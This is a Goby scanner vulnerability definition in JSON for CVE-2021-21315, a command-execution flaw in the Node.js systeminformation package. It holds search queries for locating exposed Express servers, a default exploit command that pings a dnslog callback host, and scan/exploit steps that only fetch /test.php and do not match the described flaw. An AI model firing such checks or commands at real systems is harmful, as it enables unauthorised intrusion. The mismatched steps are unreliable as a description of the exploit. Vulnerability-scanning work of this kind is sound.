Goby/json/Node.js-systeminformation-(...

145 lines
5.8 KiB
JSON
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

{
"Name": "Node.js systeminformation (CVE-2021-21315)",
"Description": "<p>Systeminformation for Node.js is a backend development kit capable of running JavaScript.</p><p>An arbitrary command execution vulnerability exists in the systeminformation package of Node.js. An attacker can use this vulnerability to execute illegal operating system commands and obtain server permissions.</p>",
"Product": "Node.js systeminformation",
"Homepage": "https://www.npmjs.com/package/systeminformation",
"DisclosureDate": "2022-01-04",
"Author": "1291904552@qq.com",
"FofaQuery": "banner=\"X-Powered-By: Express\" || header=\"X-Powered-By: Express\"",
"GobyQuery": "banner=\"X-Powered-By: Express\" || header=\"X-Powered-By: Express\"",
"Level": "2",
"Impact": "<p>An arbitrary command execution vulnerability exists in the systeminformation package of Node.js. An attacker can use this vulnerability to execute illegal operating system commands and obtain server permissions.</p>",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525\">https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>",
"Translation": {
"CN": {
"Name": "Node.js systeminformation 环境存在任意命令执行漏洞(CVE-2021-21315)",
"Product": "Node.js systeminformation",
"Description": "<p>Node.js的systeminformation是一个能够运行JavaScript的后端开发包。</p><p>Node.js的systeminformation包存在任意命令执行漏洞攻击者可利用该漏洞执行非法操作系统命令获取服务器权限。</p>",
"Recommendation": "<p>⼚商已发布了漏洞修复程序,请及时关注更新:<a href=\"https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525\">https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525</a></p><p>1、通过防⽕墙等安全设备设置访问策略设置⽩名单访问。</p><p>2、如⾮必要禁⽌公⽹访问该系统。</p>",
"Impact": "<p>Node.js的systeminformation包存在任意命令执行漏洞攻击者可利用该漏洞执行非法操作系统命令获取服务器权限。</p>",
"VulType": [
"命令执行"
],
"Tags": [
"命令执行"
]
},
"EN": {
"Name": "Node.js systeminformation (CVE-2021-21315)",
"Product": "Node.js systeminformation",
"Description": "<p>Systeminformation for Node.js is a backend development kit capable of running JavaScript.</p><p>An arbitrary command execution vulnerability exists in the systeminformation package of Node.js. An attacker can use this vulnerability to execute illegal operating system commands and obtain server permissions.</p>",
"Recommendation": "<p>The vendor has released a bug fix, please pay attention to the update in time: <a href=\"https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525\">https://github.com/sebhildebrandt/systeminformation/commit/07daa05fb06f24f96297abaa30c2ace8bfd8b525</a></p><p>1. Set access policies and whitelist access through security devices such as firewalls.</p><p>2.If not necessary, prohibit public network access to the system.</p>",
"Impact": "<p>An arbitrary command execution vulnerability exists in the systeminformation package of Node.js. An attacker can use this vulnerability to execute illegal operating system commands and obtain server permissions.</p>",
"VulType": [
"rce"
],
"Tags": [
"rce"
]
}
},
"References": [
"http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202102-1202"
],
"HasExp": true,
"ExpParams": [
{
"name": "cmd",
"type": "input",
"value": "ping 4rhdvk.dnslog.cn"
}
],
"ExpTips": null,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Tags": [
"rce"
],
"VulType": [
"rce"
],
"CVEIDs": [
"CVE-2021-21315"
],
"CVSSScore": "9.0",
"AttackSurfaces": {
"Application": null,
"Support": null,
"Service": null,
"System": null,
"Hardware": null
},
"CNNVD": [
"CNNVD-202102-1202"
],
"CNVD": [
""
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": {},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": []
}
],
"Is0day": false
}